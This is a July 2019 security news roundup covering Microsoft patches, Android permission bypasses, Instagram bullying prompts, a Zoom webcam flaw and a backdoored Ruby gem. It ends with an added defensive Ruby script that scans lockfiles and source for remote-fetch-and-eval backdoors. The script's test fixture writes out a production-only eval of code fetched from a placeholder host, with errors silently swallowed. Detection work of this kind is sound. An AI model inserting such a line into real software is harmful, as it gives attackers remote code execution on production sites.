July 10, 2019
Two zero days and 15 critical flaws fixed in July’s Patch Tuesday
By John E Dunn
Patch Tuesday this month offers fixes for a total of 77 vulnerabilities, of which 15 are marked critical, rounded out by two zero-day flaws just to make things interesting.
However, with an operating system estate as large as Microsoft’s these days, numbers don’t tell the whole story.
A good example of this is Microsoft’s Edge and Internet Explorer 11 browsers, which, including two overlaps, are patched for seven and six flaws respectively, all rated critical, and all remote code execution (RCE) flaws in the most vulnerable part of a browser, the web scripting engine.
It’s worth drawing attention to this because it’s easy to overlook the security of software bundled in Windows 10 which some users either use infrequently, or do not use at all.
As explained in previous coverage, this is particularly the case with IE 11, which many Windows 10 users don’t even realise is there but hangs around to maintain backwards compatibility. Compare that to Windows 10 64-bit version 1903, which earns only one critical, CVE-2019-1102.
Zero days
The two zero days are CVE-2019-0880 and CVE-2019-1132, both Elevation of Privilege (EoP) flaws currently being exploited in the wild by unnamed threat groups. The first affects the Windows splwow64 print spooler while the second is in Win32k.
Read more at https://nakedsecurity.sophos.com/2019/07/10/two-zero-days-and-15-critical-flaws-fixed-in-julys-patch-tuesday/
Rogue Android apps ignore your permissions
By Danny Bradbury
You know those Android dialogue boxes that pop up when you first run an app, asking you what permissions you want to give the software? They’re not as useful as we all thought.
New research has revealed that apps are snooping on data including location and the phone’s unique ID number – even when users haven’t given permission.
The research comes from researchers at the University of Calgary, U.C. Berkeley, the IMDEA Networks Institute, the International Computer Science Institute (ICSI) and AppCensus, which offers a searchable database detailing the privacy issues with individual apps. The paper, called 50 Ways to Leak Your Data: An Exploration of Apps’ Circumvention of the Android Permissions System, identified dozens of apps circumventing permissions-based protections in Android to get the data they want.
Android apps must ask for permission to access sensitive resources on the phone, like the GPS, the camera, or the user’s contacts data. When you say that an app can’t access your location data, the operating system can prevent it from doing so because it runs the app in its own sandbox. That sandbox also stops the app in question from interacting with other apps.
Sidestepping permissions
The researchers analysed over 88,000 Android apps to see what data they transmitted from the phone, and where they sent it. They ran the test on a variety of Android systems, with the most recent being Android Pie (2018). They matched this against the permissions that the user had granted the app to see if apps were harvesting data that they shouldn’t be. They found dozens of apps transmitting data they shouldn’t have accessed, along with thousands more containing the code to do so. They reverse engineered the code and found two main methods for circumventing permissions protections.
Read more at https://nakedsecurity.sophos.com/2019/07/10/android-apps-sidestepping-permissions-to-access-sensitive-data/
Instagram asks bullies, ‘Are you sure you want to say that?’
By Lisa Vaas
Instagram on Monday announced that it’s now using artificial intelligence (AI) to detect speech that looks like bullying and that it will interrupt users before they post, asking if they might want to stop and think about it first.
The Facebook-owned platform, hugely popular with teens, also plans to soon test a new feature called “Restrict” that will enable users to hide comments from specific users without letting them know that they’ve been muted.
In the blog post, Instagram chief executive Adam Mosseri said the company “could do more” to stop bullying and help out its victims:
We can do more to prevent bullying from happening on Instagram, and we can do more to empower the targets of bullying to stand up for themselves.
These tools are grounded in a deep understanding of how people bully each other and how they respond to bullying on Instagram, but they’re only two steps on a longer path.
Think before you post
Instagram posted one example of what would-be bullies are going to see if its AI interprets their comments as offensive: a user who types “you are so ugly and stupid” gets interrupted with a notice saying: “Are you sure you want to post this? Learn more”.
If the user taps “learn more”, they get this notice: “We are asking people to rethink comments that seem similar to others that have been reported.”
Read more at https://nakedsecurity.sophos.com/2019/07/10/instagram-asks-bullies-are-you-sure-you-want-to-say-that/
Zoom flaw could force you into a meeting, expose your video feed
By Lisa Vaas
Zoom, a company that sells video conferencing software for the business market, is tweaking the app to fix a vulnerability in its software that allows malicious websites to force users into a Zoom call with the webcam turned on.
The flaw was discovered by security researcher Jonathan Leitschuh, who documented it in a blog post on Monday.
He said that initially, the vulnerability would have also allowed any webpage to inflict a denial of service (DoS) attack on a Mac by repeatedly forcing a user onto an invalid call. But that DoS vulnerability – CVE-2019-13449 – was fixed in version 4.4.2 of the macOS client.
In discussions with the Zoom team over the past few weeks, Leitschuh said that Zoom had proposed a fix to the hijacking vulnerability: namely, digitally signing requests from websites that are made to the client.
But the researcher said that wouldn’t have solved the problem, given that an attacker would be able to set up a server to make requests to the Zoom site in order to acquire a valid digital signature before contacting the client.
Note. The original version of this article stated that this flaw was specific to Zoom on the Mac, but Jonathan Leitschuh has confirmed in a tweet that this issue can affect Windows users too. See below for how to prevent Zoom turning on your camera by default when you join a meeting. [Updated 2019-07-09T18:20Z]
Read more at https://nakedsecurity.sophos.com/2019/07/09/zoom-flaw-could-force-mac-users-into-meetings-expose-video-feed/
Backdoor discovered in Ruby strong_password library
By John E Dunn
An eagle-eyed developer has discovered a backdoor recently sneaked into a library (or ‘gem’) used by Ruby on Rails (RoR) web apps to check password strength.
A close shave, then. While the Ruby scripting language and RoR aren’t as popular as they once were, they’re still embedded in numerous enterprise development environments, many of which might have used the default library, strong_password, in its infected version 0.0.7.
The discovery came about after Epion Health developer Tute Costa noticed something unusual while carefully updating a family of libraries used by his company’s developers, in order to fix bugs and security vulnerabilities.
When he looked at the strong_password gem on RubyGems.org, he couldn’t locate a changelog explaining how it got to the updated version from 0.0.6, an event which happened on 25 June 2019.
The previous GitHub version had been updated in October 2018. Comparing the two versions, he noticed the mystery 0.0.7 version embedded a download link which:
Fetches and runs the code stored in a pastebin.com, only if running in production, with an empty exception handling that ignores any error it may raise.
The backdoor would download code from the Pastebin address on production sites, giving the attackers remote code execution and silently hijacking any website unfortunate enough to have updated to the rogue strong_password gem.
Read more at https://nakedsecurity.sophos.com/2019/07/09/backdoor-discovered-in-ruby-strong_password-library/
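Two defender-side checks for the kind of supply-chain backdoor described above, as an added example that is not part of the article or of the strong_password project: the first flags a Gemfile.lock that pins a gem version from a known-bad list (seeded only with strong_password 0.0.7, the version the article names), and the second is a static triage heuristic over Ruby source that looks for the combination the article describes, a network fetch whose result is passed to eval, a production-only guard and a rescue that swallows every error. The lockfile and the two source snippets are constructed samples; the suspicious one mirrors the shape of the pattern with a placeholder URL and is not the real backdoor code.

```ruby
# Added example (not from the article or the strong_password gem). Two checks a
# team could run over a dependency update:
#   lockfile_hits        - known-bad gem versions pinned in a Gemfile.lock
#   remote_eval_findings - "fetch remote code, eval it, only in production,
#                          ignore all errors" indicators in Ruby source
# The heuristic is a triage aid: a hit means "read this file", not "compromised".
require 'set'

# Known-bad releases, "name" => Set of versions. Only the release named in the
# article is listed; in real use feed this from an advisory source.
KNOWN_BAD = { 'strong_password' => Set['0.0.7'] }.freeze

# Parse "    name (version)" lines from the specs: section of a Gemfile.lock.
# Resolved gems sit at four spaces of indent; nested requirements use six and
# are deliberately not matched.
def lockfile_specs(lock_text)
  lock_text.each_line.filter_map do |line|
    m = line.match(/\A {4}(\S+) \(([^)]+)\)\s*\z/)
    m && [m[1], m[2]]
  end
end

# Return [[name, version], ...] for every locked gem on the known-bad list.
def lockfile_hits(lock_text, known_bad = KNOWN_BAD)
  lockfile_specs(lock_text).select do |name, version|
    known_bad.fetch(name, Set.new).include?(version)
  end
end

# Indicators over the whole source text, named after the behaviour the article
# attributes to the rogue gem. Each is a plain regex so the check stays fast.
INDICATORS = {
  remote_fetch:    /Net::HTTP\b|\bURI\.open\(|open-uri|OpenURI|\bHTTParty\b|\bFaraday\b/,
  dynamic_eval:    /\b(?:eval|instance_eval|class_eval|module_eval)\b/,
  production_only: /Rails\.env\.production\?|ENV\[["']RAILS_ENV["']\]\s*==\s*["']production["']/,
  # "rescue" (optionally "=> e") followed directly by "end", or "rescue nil".
  silent_rescue:   /^\s*rescue(?:\s*=>\s*\w+)?\s*\n\s*end\b|\brescue\s+nil\b/
}.freeze

# Names of the indicators present, in INDICATORS order.
def remote_eval_findings(source)
  INDICATORS.filter_map { |name, rx| name if source.match?(rx) }
end

# Fetch plus eval is the high-severity pair on its own; the other two
# indicators only raise confidence that the code is trying to hide.
def high_risk?(source)
  hits = remote_eval_findings(source)
  hits.include?(:remote_fetch) && hits.include?(:dynamic_eval)
end

# --- Constructed samples (not real project files) ---------------------------
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      rails (5.2.3)
      strong_password (0.0.7)
      thor (0.20.3)

  PLATFORMS
    ruby
LOCK

BENIGN_SRC = <<~RUBY
  module StrongPassword
    def self.entropy(password)
      password.chars.uniq.size * Math.log2(password.size + 1)
    end
  end
RUBY

# Shape of the pattern the article describes; the URL is a placeholder.
SUSPICIOUS_SRC = <<~RUBY
  begin
    if Rails.env.production?
      eval(Net::HTTP.get(URI("https://example.invalid/PLACEHOLDER")))
    end
  rescue
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  puts "lockfile hits: #{lockfile_hits(SAMPLE_LOCK).inspect}"
  puts "benign src:    #{remote_eval_findings(BENIGN_SRC).inspect}"
  puts "suspicious:    #{remote_eval_findings(SUSPICIOUS_SRC).inspect} high_risk=#{high_risk?(SUSPICIOUS_SRC)}"
end
```

Run it over `Gemfile.lock` and the unpacked contents of a freshly fetched gem (`gem fetch` then `gem unpack`) before the update lands in production; the lockfile check is exact and the source heuristic is intentionally noisy, so treat its output as a reading list rather than a verdict.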